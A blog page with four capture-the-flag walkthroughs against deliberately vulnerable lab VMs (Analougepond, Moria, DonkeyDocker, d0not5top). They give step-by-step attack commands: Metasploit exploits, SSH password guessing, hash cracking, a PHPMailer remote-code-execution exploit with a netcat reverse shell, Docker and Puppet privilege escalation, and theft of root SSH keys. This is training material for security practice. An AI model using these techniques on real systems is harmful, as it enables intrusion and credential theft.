Hack the Analougepond VM (CTF Challenge)

Hello friends! Today we are going to take another CTF channeling known as Analougepond which Based on our previous article “SSH pivoting”, if you are aware of ssh pivoting then you can easily breach this vm machine.

The credit for making this vm machine goes to “Knightmare” and it is another boot to root machine where author has hide flag for attacker as the new challenge.

 Lets Breach!!!

 The target holds 192.168.0.108 as network IP; now using nmap lets find out open ports.

nmap -sT -sU 192.168.0.108

From give image you can check port 22 for SSH, 68 for DHCP and 161 for SNMP are open in target network.

Now let’s enumerate for SNMP enumeration using metasploit

This module allows enumeration of any devices with SNMP protocol support. It supports hardware, software, and network information. The default community used is “public”

 use auxiliary/scanner/snmp/snmp_enum

msf auxiliary(snmp_enum) > set rhosts 192.168.0.108

msf auxiliary(snmp_enum) > set threads 5

msf auxiliary(snmp_enum) > exploit

 From given image you can read system information, like host IP, hostname, description and etc. you will notice that here I had highlighted contact which contain a name Eric Burdon and location which contains some text “there is a hose in New Orleans they call it………

Here eric could be a hint for username, now let ask from Google for “there is a hose in New Orleans they call it………”.

So when I search for given text in Google, I found that these texts are the lyric of a poem “The House of Rising Sun”. It might be possible that the author knightmare wants to give some password clue through this poem. From given image you can read the highlighted text “the Rising Sun” which could be the password for SSH.

Now let’s enumerate for SSH login using metasploit

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhost 192.168.0.108

msf auxiliary(ssh_login) > set username eric

msf auxiliary(ssh_login) > set password therisingsun

msf auxiliary(ssh_login) >exploit

 As result we had successfully login and obtained command shell session 1of targeted system, more found install version of ubuntu i.e. 14.04.1

If you will search in Google you will come to know that ubuntu 14.04.1 is exploitable to overlayfs privilege escalation.

This module attempts to exploit two different CVEs related to overlayfs. CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55 3.16.0-25 (14.10 default) < 3.16.0-41 3.19.0-18 (15.04 default) < 3.19.0-21 CVE-2015-8660: Ubuntu: 3.19.0-18 < 3.19.0-43 4.2.0-18 < 4.2.0-23 (14.04.1, 15.10) Fedora: < 4.2.8 (vulnerable, un-tested) Red Hat: < 3.10.0-327 (rhel 6, vulnerable, un-tested)

use exploit/linux/local/overlayfs_priv_esc

msf exploit(overlayfs_priv_esc) > set  lhost 192.168.1.105

msf exploit(overlayfs_priv_esc) > set session 1

msf exploit(overlayfs_priv_esc) > exploit -j

This times also we had successfully got command shell session 2 opened of target system.

Now convert command shell (for session 2) into meterpreter shell using following command

sessions -u 2

This will a new session which session 3 for meterpreter shell

meterpreter> ls

meterpreter> cat flag.txt

We have Captured 1st flag successfully!!

When as check network interface configuration in target system I found a new IP 192.168.122.1 on its 3rd interface as shown in given image.

This module manages session routing via an existing Meterpreter session. It enables other modules to ‘pivot’ through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

 msf > use post/multi/manage/autoroute 

msf post(autoroute) > set subnet 192.168.122.1

msf post(autoroute) > set session 3

msf post(autoroute) > exploit

meterpreter > arp

Here you can check all IP and MAC address, 192.168.122.2 and 192.168.122.3 will be another target.

Enumerate open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.

 use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set rhost 192.168.122.2

msf auxiliary(tcp) > set 1-500

msf auxiliary(tcp) > set thread 10

msf auxiliary(tcp) > exploit

From result we found port 22 is open which used for SSH.

Move inside into meterperer shell then type following command for port forwarding of port 22 into port 8000 as shown below:

Sessions 3

Portfwd add -l 8000 -p 22 -r 192.168.122.2

Now login into SSH server through localhost with forwarded port

Ssh localhost -p 8000

From given image you can read the massage again it is a hint for username as “sandieshaw”; now let ask from Google for his famous song to get some hint for password.

After searching on google we guessed that the password should be sandieshaw’s famous song “puppetonastring”.

Now with this password we connect to sandieshaw through ssh.

After connecting to sandieshaw through ssh we found that we have to root this system.

After looking through the files on this system we found that Puppet is running on this system.

Among those files we find that a puppet file contains instructions to copy spin file in root access after ensuring it is present in the /tmp/ folder of the system.

Then we go into the files folder we found two files one in c language and another an executable file.  Opening the c file, we found it is the code for spinning pipe. Now we replace the c executable file with our file that gives the root access to the system.

The puppet file should execute this as root user and we will get the root shell to server.

We then come back to the meterpreter shell and upload it to the current user eric.

meterpreter > upload /root/Desktop/spin.c

After upload it into the system we compile it and send it to the sandieshaw using ssh.

scp spin sandieshaw@192.168.122.2:/home/sandieshaw

Now we replace the spin file in the /etc/puppet/modules/wiggle/files/ with our spin file.

The spin is replaced, now we have to wait for the puppet file to replace our spin file to that in /tmp/

After waiting for some time we execute the spin file present in /tmp/ folder.

 

Now we have the root shell, moving into the /root/protovision folder we found a flag that is hexadecimal format.

After converting it we found a base64 encoded inverse string.

After reversing the string and decoding it we found that it was a link to a youtube video.

Then we moved on to the other files jim and melvin didn’t had anything significant so we moved to the folder .I_have_you_now. There we found a folder .a, to check how many folders were there inside we searched for all the folders inside with command:

find . -type d

We found that it goes all the way to .z, we move to this location to see its content.

We found two files one in gpg encryption and another readable file then we decode this file using command:

gpg nleeson_key.gpg

This will ask a passphrase, the password is secret which is hinted in the video.

Opening the file we found that it was a private key. So we removed the permissions of the file using:

chmod 600 nleeson_key

Then we look at the content of the other file it displayed a single word joshua.

During our network scan we found another ip 192.168.122.3 that had ssh open but we couldn’t connect to it.

Now we try to connect to it using the private key we found.

After guessing a few users we found that nleeson was the user for the system.

using the key will ask for a passphrase and the password is joshua.

We connected to the system 192.168.122.3. After looking around we couldn’t find anything, so we went back into the root of 192.168.122.2. Here after looking through the files we found that 192.168.122.2 was the puppet server and 192.168.122.3 was the puppet client. We found a file called barringsbank-passwd that held all the username and password of 192.168.122.3.

So we added a new user ignite to this file by opening this file in vim.

Linux uses md5 salt hashes as password so we create an md5 hash using ignite and xyz as salt.

Then we add our user to sudoers to gain root access.

Then we give our new user permissions same as root.

Then we connect to 192.168.122.3 through ssh and using the username and password we just created.

Now we have to wait for some time for the puppet server to update the sudoers, so that our user can have root access.

Then we go to root shell using sudo su.

We move into the root folder and find an image file me.jpeg.

We then copy the image file to eric using ssh.

scp me.jpeg eric@192.168.1.119:/home/eric/

Then we download the file from eric to our local system through metasploit. We go to our meterpreter shell and download the me.jpeg to our system.

meterpreter > cd eric/

meterpreter > download me.jpeg /root/Desktop/

We used to exiftool on this file and found nothing so we performed steganography using steghide.

First we check if there is any file hidden behind this image using command:

steghide –info me.jpeg

The passphrase to this file is reticulatingsplines, I found it after various attempts.

Performing steganography we found a file hidden text file.

We extract the text file using steghide, we use the following command:

steghide extract -sf me.jpeg

It will again ask for an password i.e. reticulatingsplines.

After extracting the file we found that it is encrypted in hexadecimal format.

After converting the file from hexadecimal we found that the text was again encrypted in base64 format.

The text contains recurring gACI phrase that doesn’t allow it to be converted from base64 format.

After removing it we found that the text was inversed after reversing and decoding it we got the final flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

Hack the Moria: 1.1 (CTF Challenge)

Today I found a Vulnerable Lab based on the world of Lords of The Rings. So get on your Gandalf mode to solve this fun Vulnerable Lab Moria 1.2., we are going to download the VM Machine from here.

The credit for developing this VM machine is goes to Abatchy. It is a Boot2Root Lab.

Note: According to author you don’t need LOTR knowledge to hack this VM, but trust me, you need it.

Let’s Breach!!!

As always, Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.125 but you will have to find your own)

netdiscover

Use nmap command for port enumeration

nmap -sV 192.168.1.125

As you can see port 21 for ftp, port 22 for ssh and port 80 for http are open, so let’s explore port 80 through Browser.

After Browsing I found this Image with label Gates of Moria. I decided to do a bit research on the text written in given below the image. After searching through some wiki pages, I found its translation “Say Friend and Enter” where Mellon means Friend.

So Friend or Mellon must be a password. Keeping that in mind let’s move forward. Here I decided to scan the target directory using dirb scan. Now open the terminal in Kali Linux and type the following command:

dirb http://192.168.1.125/

From scanning result I choose the highlighted directory for further enumeration.

http://192.168.1.125/w/

So I opened this directory in the Browser and found another directory inside it i.e h/

On opening it I got another directory and so on until it completes path /w/h/i/s/p/e/r. Here we find the last directory named the_abyss/

On opening the_abyss, I got some text as shown in image. Fundin:”That human will never save us!”

Tried to look at source code but nothing then again try to refresh the page and then found this above given text get changed into another the text, again refresh the page again text change into “Knock Knock”.

Firstly seemed weird but then I refreshed again and it changed again hence text were changing randomly when I refresh the web page.

So I decided to do a dirb scan but it gave no result, so I did an extension dirb scan as shown.

dirb http://192.168.1.125/w/h/i/s/p/e/r/the_abyss/ -X .txt .img .html

This dirb scanner scans for a particular extenstion which is specified like .txt or .img etc.

Aha! Found a file namedrandom.txt.

So I opened it through the browser and found all the text that was coming on refreshing page in a single webpage as shown.

This text contains a lot of names like Balin, Oin, Ori, Fundin, Nain, Eru, Balrog, I noted them because they might be usernames or passwords.

Now I tried to connect with ftp port.

ftp 192.168.1.125

 

It greeted with Welcome Balrog

And I knew it must be the username because it was in the random.txt too but for password, I had tried multiple names which I found previously and then I remembered the text form the image, “Say friend and enter”. I entered Friend but login failed then tried with Mellow and got login successfully.

Therefore for FTP Login give following credential:

Username: Balrog

Password: Mellow

NOTE: – If you get an error, restart VM and also try multiple times with the above username and password.

After login, I tried pwd command and got the path to be /prision. I looked around it in hope of a flag but didn’t found any hint for flag. Then I found var folder and move inside inside.

Then I got to /var/www/html here I found this folder QlVraKW4fbIkXau9zkAPNGzviT3UKntl

When opened it in browser I found a table having two columns for Prisoner’s name and Passkey as shown in given image.

As always, I searched the source code for some hint. From View Source page I found the “salt” which can be used to decrypt the MD5 Password.

After trying different kinds of formats to decrypt above MD5 password I created a file with name and passkey and salt in this format 

Prisoner’s Name:Passkey$Salt

Name it whatever you want (Here I named it passwords and saved it on my kali Desktop).

Now we will run John The Ripper, Dynamic -6 on this file to decrypt it. By using this command in my kali terminal

john–form=dynamic_6 /root/Desktop/lol

These look like login credentials.

After trying all user credentials decrypted to login in ssh, I got success with

SSH Login

Username :Ori

Password :spanky

Now login into ssh using above credential

ssh Ori@192.168.1.125

Here we got the bash shell. Now I tried multiple commands in search of a flag in ls-al, I found a poem.txt file, which contains a poem. But it didn’t find any flag inside it.

Then I looked into.ssh/ directory And found know_hosts file, and id_rsa file which contained the private key and then open these file one by one,

cat id_rsa

Copy the entire text found inside id_rsa in a text file and save as id_rsa.

Now open another file known_host with cat command, here you will find host is “127.0.0.1”, let use these information for ssh login for root user.

ssh -i id_rsa root@127.0.0.1

I got the ROOT.

But let’s finish it properly.  So I tried ls -la scan to get a flag. And I found a flag.txt inside flag.txt I got the Final Message “All that is gold does not glitter”.

It was an adventurous and learning experience and I would like to thank Abatchy for creating such a fun VM Lab.

Author: Pavandeep Singh is An Ethical HackerCyber Security Expert, Penetration Tester, India. Contact here

Hack the DonkeyDocker (CTF Challenge)

Today we are going to solve a fun Vulnerable Lab DonkeyDocker, download this VM Machine from here.

The credit for developing this VM machine is goes to Dennis Herrmann who has hide 3 flag inside this lab as a challenge for hackers.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.120 but you will have to find your own)

netdiscover

Use nmap command for port enumeration

nmap -sV 192.168.1.120

As you can see port 22 for ssh and 80 for http are open, so let’s explore port 80 through Browser

After browsing I found three tabs Home, About and Contact but didn’t found any clue for next step, then I decided to scan the target directory using dirb scan.

Now open the terminal in kali Linux and type following command:

dirb http://192.168.1.120

From scanning result I choose the highlighted directory http://192.168.1.120/mailer/examples/ for further enumeration.

Here, we get to know that PHPMailer is running on targeted system. Let try to find out its version.

So After browsing a bit about PHP Mailer, we came know that how to get the version of phpmailer

http://192.168.1.120/mailer/VERSION

We got the version of PHPMailer i.e. 5.2.16.

From Google we came to known that PHPMailer 5.2.16 is vulnerable to Remote Code Execution (python) {CVE-2016-10033}. Exploiting PHPMail with back connection (reverse shell) from the target. You can download this exploit from here.

After Downloading the Python File and make following changes:

  1. Open the file and add “# coding: utf-8” at the beginning.
  2. Set target = ‘http://192.168.1.120/contact’ (victim IP), it is the location where backdoor.php get uploaded in victim’s machine automatically.
  3. Give attacker IP : 192.168.1.101(kali Linux IP) inside payload code
  4. After making above changes save it.

Now start natcat at port same port on which the payload is bind i.e. 4444 for establishing reverse connection with target.

nc -lvp 4444

Before you run the python script, type following command in a new terminal which will install the exploit dependency.

pip2 install requests_toolbelt

Now run the script in order to exploit the target as shown in given image.

python 40974.py

Move back natcat shell and here you will find that it is connected to victim but not able to access proper shell of victim system therefore type given command in order to access victim shell properly as shown in image.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Once you got the victim shell type following commands for finding hidden flag.

ls

cat main.sh

Here we found user smith which is a directory has flag.txt let approach toward this directory.

cd home

ls

While again opening smith directory, we got Permission denied.

Then we used su smith to instead of sudo, because sudo is not accessible in this shell

su smith

For Password we tried “smith” and successfully get smith’s shell

Now we are inside smith shell, type following command to get the flag

ls

cd /home/smith

ls

flag.txt

cat flag.xt

Great!! Successfully capture 1st flag

Moreover if you notice the given image you will find next clue “I like 1984 written by Geoge ORWELL” it could be possible that it might be a user name having 2nd flag inside it.

Type following command to view all directory list

ls -al

We got the authorized keys, id_ed25519 and id_ed25519.pub in SSH directory, lets open these key one by one

cat authorized_keys

cat id_ed25519

cat id_ed25519.pub

In id_ed25519 we get the Openssh Private Key and this key is authorized for orwell@donkeydocker. Now copy the private key and past inside the text file.

We have Save this Private Key in a file as id_rsa as shown in given below image.

Now using ssh login by

Ssh –I id_rsa orwell@192.168.1.120

Here you will be greeted by the Donkey Docker Shell. Now check directory list for 2nd flag

Ls

Flag.txt

Cat flag.xt

 Nice!! Successfully got 2nd shell

Now for the last flag we tried and a lot of different tricks but nothing seems to get through and you can read an article from here, which help in finding the 3rd flag.

Type following command

docker run –v /root:/hack –t debian:jessie /bin/sh -c ‘ls -al /hack’

This created a user named Jessie and gave it root access through privilege escalation; check all directory lists inside it, here we get the flag.txt file.

Now to open this file we will use the previous command just with slight modification as shown:

docker run -v /root:/hack -t debian:jessie /bin/sh -c ‘cat /hack/flag.txt’  

Awesome we got 3rd flag also.

Author: Pavandeep Singh is An Ethical HackerCyber Security Expert, Penetration Tester, India. Contact here

Hack the d0not5top VM (CTF Challenge)

This time we are going to solve a fun Vulnerable Lab d0not5top 1.2. To do so we are going to download the VM Machine from here.

The credit for developing this VM machine is goes to 3mrgnc3 who has hide 7 flag inside this lab as a challenge for hackers.

Let’s Breach!!!

As always, Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.113 but you will have to find your own)

netdiscover

Next we run nmap

nmap -sV 192.168.1.113

Now, visit the IP in the Browser.

Since we I didn’t found something interesting when explore its IP in browser therefore now I am going to scan the Web Content by using dirb in kali linux.

dirb http://192.168.1.113

As you can observe from above image I had highlighted a URL which indicates toward the control panel of website lets open 192.168.1.113/control in the Browser. Yes it is DNS control panel but I didn’t found any clue for 1st flag on this web page.

After that move towards its view source page and notice FL46_1 which indicate it is the 1st flag.

Wonderful!! Successfully found 1st flag

From the scanning result of dirb we found so many web directories in this machine therefore further I choose 192.168.1.113/control/js Directory. In this I found a File README.MadBro. It will open as shown below.

 Now here we found a Binary code which is to be converted into Decimal. On conversion you will find FL46_2:30931r42q2svdfsxk9i13ry4f2srtr98h2

Great!! Successfully get 2nd Flag.

Now, for third flag, we will use netcat very verbrose mode on port 25 which hosts smtpd service (This can be found by doing an aggressive nmap scan on the IP)

nc -vv 192.168.1.113 25

Here we found a Hexadecimal code which is to be converted in Text.

Great!! Successfully get 3nd Flag also.

On the url on which we found Second Flag, There is an instruction written in Leet, It reads: M4K3 5UR3 2 S3TUP YOUR /3TC/HO5TS N3XT TIM3 L0053R… 1T’5 D0Not5topMe.ctf!!! So we will go to /etc/hosts and add an entry as shown in given image.

Now open donot5topme.ctf in the browser as shown and Click on Register given at the end of web page.

As you can observe that we didn’t found any clue on this web page therefore open view source page.

At View Page Source, here we found this link as shown in highlighted text.

Such kind of encoded web page is open then I search in google related to this encoding. It is known as brain fuck encoding.

So we will decrypt it. Here we got the FL46_4

Successfully found 4th flag

Now move back to the d0not5topme.ctf. Now we will click on Register and Then on I agree to these terms and we will get to Registration Page. Here we click on Board Administration, which opens a prompt which asks for the client to open mailto link, here I choose Gmail.

Here I found another ctf “Megusta@G4M35.ctf

Now let’s add G4M35.ctf into /etc/hosts as we did before and click on Save.

When I open this domain in browser, I got a game to play, although you can get the next clue by playing too, but I  thought of a more technical approach and open this webpage and with Inspect Element. Now select the Debugger Tab. Here I found game.js and inside the Game_Over script I found the next clue as “/H3X6L4m3

Now open the complete link “g4m35.ctf/H3X6L4m3” on this domain it gave me another game.

Again we can play and discover the next clue/flag. But we went to get a bit technical approach and ran a dirb command to look after its directories.

dirb http://g4m35.ctf/H3x6L64m3/ /usr/share/wordlists/dirb/big.txt

From given result I had highlighted http://g4m35.ctf/H3x6L64m3/textures/ for further enumeration.

Now I have opened this textures directory in the browser, here I open the skybox directory and then the dawnclouds directory and found the nz.jpg file as shown.

Now open this image and got the octal code.

When decode this code I found FL46_5

I had Captured 5th flag also!!

Now get back to the second game http://g4m35.ctf/H3x6L64m3 and open with Inspect Element. Now select the Debugger Tab. Here I found Gameplay.js and got another domain “t3rmln4l.ctf” as shown below.

Now let’s add t3rmln4l.ctf into /etc/hosts as we did before and click on Save.

Now as before, while opening this domain in browser, I got a Terminal which asks for password. After trying a bunch of commands, I found grep* runs on this terminal and for authentication I entered the name of domain as password i.e t3rm1a4l.ctf and found another domain “M36u574.ctf”.

Now let’s add M36u574.ctf also into /etc/hosts as we did before and click on Save.

Now as before, you will open this domain in browser, you will get a slideshow of Megusta images. Out of different images I have downloaded the kingmegusta.jpg.

 Now we will run exiftool on this image, here I got some code in Comment as shown below.

Now convert the code to Text and found following code as shown in image. Copy this code it is base64 encoded.

Then I had created a text file on /root/Desktop/ name anything you want and Paste the above decoded text in this file.

Now run John The Ripper, using this file as shown

john –wordlist=/usr/share/wordlists/rockyou.txt donotstop

Here I found a user MeGustaKing and Password ********** (10 times *).

Now using this username and password combination we will login into the ssh. Here we get a code and another username and password combination i.e. burtieo:Lets you update your FunNotes and more! But first let’s decode that highlighted code.

Copy and paste above code inside it. It is in base64 encryption, after decrypting the code we found that it is md5 encoded.

Great! It is the 6th Flag.

As mentioned above in the previous ssh login we got this username burtieo and its password is the text written above it i.e. Lets you update your FunNotes and more!

Now let’s login in ssh using combination

Username : burtieo and Password : Lets you update your FunNotes and more!

This opens rbash shell and rbash shell restricts some of the features of bash shell.

So, firstly run following command

suedoh –l

And then we run the command

suedoh /usr/bin/wmstrt

Using nmap command I found up the port 10000 open.

But this port only remains open for 20 seconds, we can make it stay open for long using “for loop” as shown.

Now let’s run metasploit and use the exploit named file_disclosure

 msf> use auxiliary/admin/webmin/file_disclosure

msf> auxiliary (file_disclosure) > set lhost 192.168.1.113

msf> auxiliary (file_disclosure) > set ssl true

msf> auxiliary (file_disclosure) > set rpath /root/.ssh/id_rsa

msf> auxiliary (file_disclosure) > exploit

I found the RSA Private Key as shown.

 

Now Copy and Paste this Private Key in a file and name it id_rsa and then Run John The Ripper.

ssh2john id_rsa> ignite

john –wordlist:/usr/share/wordlists/rockyou.txt ignite

This has given the root password .i.e. “gustateamo

Now I have removed permissions of id_rsa by chmod 700 and login into ssh as root with password gustateamo as shown below.

Now type following command

ls

You can observe from given image it consist two file let open one of them

cat L45T_fl46.pl

Here it gave the message to use L45T_fl46.pl

Now use netcat command to establish connection with target through port 1234.

nc -lp 1234 –vv

Now in D0Not5top terminal we will open file L45T_fl46.pl with IP 192.168.0.7 (Kali Linux IP) as given below:

./ L45T_fl46.pl 192.168.0.7 1234

On attacker system it will you will found get netcat connect with targeted system. The highlighted text is indicating toward FL46_7

Congratulations!! It is the 7th Flag.

Solving this lab was a fun and learning experience.

Author: Rajat Chikara is An Ethical HackerCyber Security Expert, Penetration Tester, India.

Related Posts Plugin for WordPress, Blogger...